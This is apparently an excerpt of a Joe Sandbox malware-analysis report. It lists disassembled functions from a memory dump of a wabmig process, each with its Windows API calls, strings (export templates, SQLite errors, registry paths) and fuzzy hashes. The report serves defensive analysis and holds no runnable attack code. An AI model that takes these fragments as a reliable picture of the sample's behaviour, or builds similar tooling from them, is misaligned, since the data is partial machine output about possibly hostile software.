                                                                            • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: _snwprintfwcscat
                                                                            • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                            • API String ID: 384018552-4153097237
                                                                            • Opcode ID: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                                            • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                                                            • Opcode Fuzzy Hash: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                                            • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: ItemMenu$CountInfomemsetwcschr
                                                                            • String ID: 0$6
                                                                            • API String ID: 2029023288-3849865405
                                                                            • Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                            • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                                                            • Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                            • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                                                            APIs
                                                                              • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                                            • memset.MSVCRT ref: 00405455
                                                                            • memset.MSVCRT ref: 0040546C
                                                                            • memset.MSVCRT ref: 00405483
                                                                            • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
                                                                            • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memset$memcpy$ErrorLast
                                                                            • String ID: 6$\
                                                                            • API String ID: 404372293-1284684873
                                                                            • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                            • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                                            • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                            • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                                            APIs
                                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                            • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                                            • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                            • wcscpy.MSVCRT ref: 0040A0D9
                                                                            • wcscat.MSVCRT ref: 0040A0E6
                                                                            • wcscat.MSVCRT ref: 0040A0F5
                                                                            • wcscpy.MSVCRT ref: 0040A107
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                            • String ID:
                                                                            • API String ID: 1331804452-0
                                                                            • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                            • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                                            • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                            • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                                            APIs
                                                                              • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                            • String ID: advapi32.dll
                                                                            • API String ID: 2012295524-4050573280
                                                                            • Opcode ID: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                                            • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                                                            • Opcode Fuzzy Hash: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                                            • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                                                            Strings
                                                                            • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                            • <%s>, xrefs: 004100A6
                                                                            • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memset$_snwprintf
                                                                            • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                            • API String ID: 3473751417-2880344631
                                                                            • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                            • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                                            • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                            • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: wcscat$_snwprintfmemset
                                                                            • String ID: %2.2X
                                                                            • API String ID: 2521778956-791839006
                                                                            • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                            • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                                            • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                            • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: _snwprintfwcscpy
                                                                            • String ID: dialog_%d$general$menu_%d$strings
                                                                            • API String ID: 999028693-502967061
                                                                            • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                            • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                                            • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                            • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                                            APIs
                                                                            • strlen.MSVCRT ref: 00408DFA
                                                                              • Part of subcall function 00408D18: memcpy.MSVCRT(?,?,00000008,00000008,00000010,00000040,?,?), ref: 00408D44
                                                                            • memset.MSVCRT ref: 00408E46
                                                                            • memcpy.MSVCRT(00000000,?,?,00000000,00000000,00000000), ref: 00408E59
                                                                            • memcpy.MSVCRT(?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408E6C
                                                                            • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,?,?,00000000,?,00000000,00000000,?,00000000), ref: 00408EB2
                                                                            • memcpy.MSVCRT(?,?,?,00000000,?,00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408EC5
                                                                            • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408EF2
                                                                            • memcpy.MSVCRT(?,00000000,00000014,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408F07
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memcpy$memsetstrlen
                                                                            • String ID:
                                                                            • API String ID: 2350177629-0
                                                                            • Opcode ID: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                                            • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                                                                            • Opcode Fuzzy Hash: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                                            • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memset
                                                                            • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                            • API String ID: 2221118986-1606337402
                                                                            • Opcode ID: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                                                            • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                                                                            • Opcode Fuzzy Hash: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                                                            • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                                                                            APIs
                                                                            • _mbscpy.MSVCRT(?,00000000,00000000,?,00000001), ref: 00408F50
                                                                            • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,?,?,00000010,?,00000000,?,00000001), ref: 00408FB3
                                                                            • memset.MSVCRT ref: 00408FD4
                                                                            • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,00000010,?,00000000,?,00000001), ref: 00409025
                                                                            • memset.MSVCRT ref: 00409042
                                                                            • memcpy.MSVCRT(?,?,00000018,00000001,?,?,00000020,?,?,?,?,00000000,?,00000001), ref: 00409079
                                                                              • Part of subcall function 00408C3C: strlen.MSVCRT ref: 00408C96
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memcmpmemset$_mbscpymemcpystrlen
                                                                            • String ID:
                                                                            • API String ID: 265355444-0
                                                                            • Opcode ID: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                                                            • Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
                                                                            • Opcode Fuzzy Hash: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                                                            • Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
                                                                            APIs
                                                                              • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                              • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                              • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                              • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
                                                                            • memset.MSVCRT ref: 0040C439
                                                                            • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                            • _wcsupr.MSVCRT ref: 0040C481
                                                                              • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                              • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                              • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                              • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                            • memset.MSVCRT ref: 0040C4D0
                                                                            • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: free$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                                                            • String ID:
                                                                            • API String ID: 4131475296-0
                                                                            • Opcode ID: 43de9e52db830488c7ebdb2928a6c49d702693ce72869a855233a6d80c0cc9be
                                                                            • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                                            • Opcode Fuzzy Hash: 43de9e52db830488c7ebdb2928a6c49d702693ce72869a855233a6d80c0cc9be
                                                                            • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
APIs
• memset.MSVCRT ref: 004116FF
  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
  • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
  • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
  • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
  • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
  • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
  • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
Strings
Memory Dump Source
• Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
Similarity
• API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
• String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
• API String ID: 2618321458-3614832568
• Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
• Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
• Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
APIs
Memory Dump Source
• Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
Similarity
• API ID: AttributesFilefreememset
• String ID:
• API String ID: 2507021081-0
• Opcode ID: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
• Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
• Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
APIs
• AreFileApisANSI.KERNEL32 ref: 004174FC
• MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
• malloc.MSVCRT ref: 00417524
• MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
• free.MSVCRT ref: 00417544
• free.MSVCRT ref: 00417562
Memory Dump Source
• Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
Similarity
• API ID: ByteCharMultiWidefree$ApisFilemalloc
• String ID:
• API String ID: 4131324427-0
• Opcode ID: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
• Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
• Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
APIs
• GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
• GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
• free.MSVCRT ref: 0041822B
Strings
Memory Dump Source
• Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
Similarity
• API ID: PathTemp$free
• String ID: %s\etilqs_$etilqs_
• API String ID: 924794160-1420421710
• Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
• Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
• Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
APIs
• memset.MSVCRT ref: 0040FDD5
  • Part of subcall function 00414E7F: memcpy.MSVCRT(004032AD,<,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
  • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
  • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
• _snwprintf.MSVCRT ref: 0040FE1F
Strings
Memory Dump Source
• Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
Similarity
• API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
• String ID: <%s>%s</%s>$</item>$<item>
• API String ID: 1775345501-2769808009
• Opcode ID: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
• Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
• Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
APIs
• wcscpy.MSVCRT ref: 0041477F
• wcscpy.MSVCRT ref: 0041479A
• CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,00411B67,?,General), ref: 004147C1
• CloseHandle.KERNEL32(00000000), ref: 004147C8
Strings
Memory Dump Source
• Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
Similarity
• API ID: wcscpy$CloseCreateFileHandle
• String ID: General
• API String ID: 999786162-26480598
• Opcode ID: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
• Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
• Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
APIs
Strings
Memory Dump Source
• Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
Similarity
• API ID: ErrorLastMessage_snwprintf
• String ID: Error$Error %d: %s
• API String ID: 313946961-1552265934
• Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
• Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
• Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
Strings
Memory Dump Source
• Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
Similarity
• API ID:
• String ID: foreign key constraint failed$new$oid$old
• API String ID: 0-1953309616
• Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
• Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
• Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
APIs
Strings
• foreign key on %s should reference only one column of table %T, xrefs: 004316CD
• unknown column "%s" in foreign key definition, xrefs: 00431858
• number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
Memory Dump Source
• Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
Similarity
• API ID: memcpy
• String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
• API String ID: 3510742995-272990098
• Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
• Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
• Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
APIs
• memset.MSVCRT ref: 0044A6EB
• memset.MSVCRT ref: 0044A6FB
• memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
• memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
Strings
Memory Dump Source
• Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
Similarity
• API ID: memcpymemset
• String ID: gj
• API String ID: 1297977491-4203073231
• Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
• Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
• Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
APIs
  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
• ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E961
• ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E974
• ??3@YAXPAX@Z.MSVCRT(00000001,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E987
• ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E99A
• free.MSVCRT ref: 0040E9D3
  • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
Memory Dump Source
• Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
Similarity
• API ID: ??3@$free
• String ID:
• API String ID: 2241099983-0
• Opcode ID: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
• Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
• Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
APIs
• AreFileApisANSI.KERNEL32 ref: 00417497
• WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
• malloc.MSVCRT ref: 004174BD
• WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
• free.MSVCRT ref: 004174E4
Memory Dump Source
• Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
Similarity
• API ID: ByteCharMultiWide$ApisFilefreemalloc
• String ID:
• API String ID: 4053608372-0
• Opcode ID: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
• Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
• Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
APIs
• GetParent.USER32(?), ref: 0040D453
• GetWindowRect.USER32(?,?), ref: 0040D460
• GetClientRect.USER32(00000000,?), ref: 0040D46B
• MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
• SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
Memory Dump Source
